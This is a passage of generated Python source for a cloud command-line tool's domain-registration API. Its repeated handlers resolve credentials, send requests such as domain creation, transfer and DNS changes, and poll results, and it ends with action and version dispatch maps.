(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTemplateList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTemplateListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeTemplateList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBatchOperationLogs(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeBatchOperationLogsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeBatchOperationLogs(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchModifyDomainInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.BatchModifyDomainInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.BatchModifyDomainInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doTransferProhibitionBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.TransferProhibitionBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.TransferProhibitionBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doTransferInDomainBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.TransferInDomainBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.TransferInDomainBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUpdateProhibitionBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.UpdateProhibitionBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.UpdateProhibitionBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTemplateRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomainOwnerBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainOwnerBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyDomainOwnerBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePhoneEmailList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePhoneEmailListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribePhoneEmailList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomainDNSBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainDNSBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyDomainDNSBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDomainPriceList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDomainPriceListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeDomainPriceList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateDomainBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateDomainBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateDomainBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
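# Each do<Action> handler above follows the same generated pattern: resolve
# credentials (CVM role, STS assume-role, or static SecretId/SecretKey/Token),
# build an HttpProfile/ClientProfile, create a DomainClient for the selected
# API version, send the request, and, when --waiter is given, poll the result
# until the waiter expression matches or the waiter timeout is reached.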
CLIENT_MAP = {
"v20180808": domain_client_v20180808,
}
MODELS_MAP = {
"v20180808": models_v20180808,
}
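# CLIENT_MAP and MODELS_MAP above select the client and model modules by API
# version; ACTION_MAP below maps each CLI action name to its generated handler.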
ACTION_MAP = {
"SetDomainAutoRenew": doSetDomainAutoRenew,
"CheckBatchStatus": doCheckBatchStatus,
"UploadImage": doUploadImage,
"SendPhoneEmailCode": doSendPhoneEmailCode,
"DescribeDomainNameList": doDescribeDomainNameList,
"DeletePhoneEmail": doDeletePhoneEmail,
"DescribeDomainBaseInfo": doDescribeDomainBaseInfo,
"DescribeBatchOperationLogDetails": doDescribeBatchOperationLogDetails,
"DeleteTemplate": doDeleteTemplate,
"CheckDomain": doCheckDomain,
"RenewDomainBatch": doRenewDomainBatch,
"DescribeTemplate": doDescribeTemplate,
"CreatePhoneEmail": doCreatePhoneEmail,
"DescribeTemplateList": doDescribeTemplateList,
"DescribeBatchOperationLogs": doDescribeBatchOperationLogs,
"BatchModifyDomainInfo": doBatchModifyDomainInfo,
"TransferProhibitionBatch": doTransferProhibitionBatch,
"TransferInDomainBatch": doTransferInDomainBatch,
"UpdateProhibitionBatch": doUpdateProhibitionBatch,
"CreateTemplate": doCreateTemplate,
"ModifyDomainOwnerBatch": doModifyDomainOwnerBatch,
"DescribePhoneEmailList": doDescribePhoneEmailList,
"ModifyDomainDNSBatch": doModifyDomainDNSBatch,
"DescribeDomainPriceList": doDescribeDomainPriceList,
"CreateDomainBatch": doCreateDomainBatch,
}
AVAILABLE_VERSION_LIST = [
"v20180808",
]
def action_caller():
return ACTION_MAP
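# A hedged sketch of how this dispatch table is presumably consumed by the
# surrounding CLI framework (the action name and argument values below are
# illustrative only):
#
#     handler = action_caller()["CheckDomain"]
#     handler({"DomainName": "example.com"}, parsed_globals)
#
# Each handler receives the action-specific arguments plus the parsed global
# options, which parse_global_arg() below normalizes before the request is sent.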
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
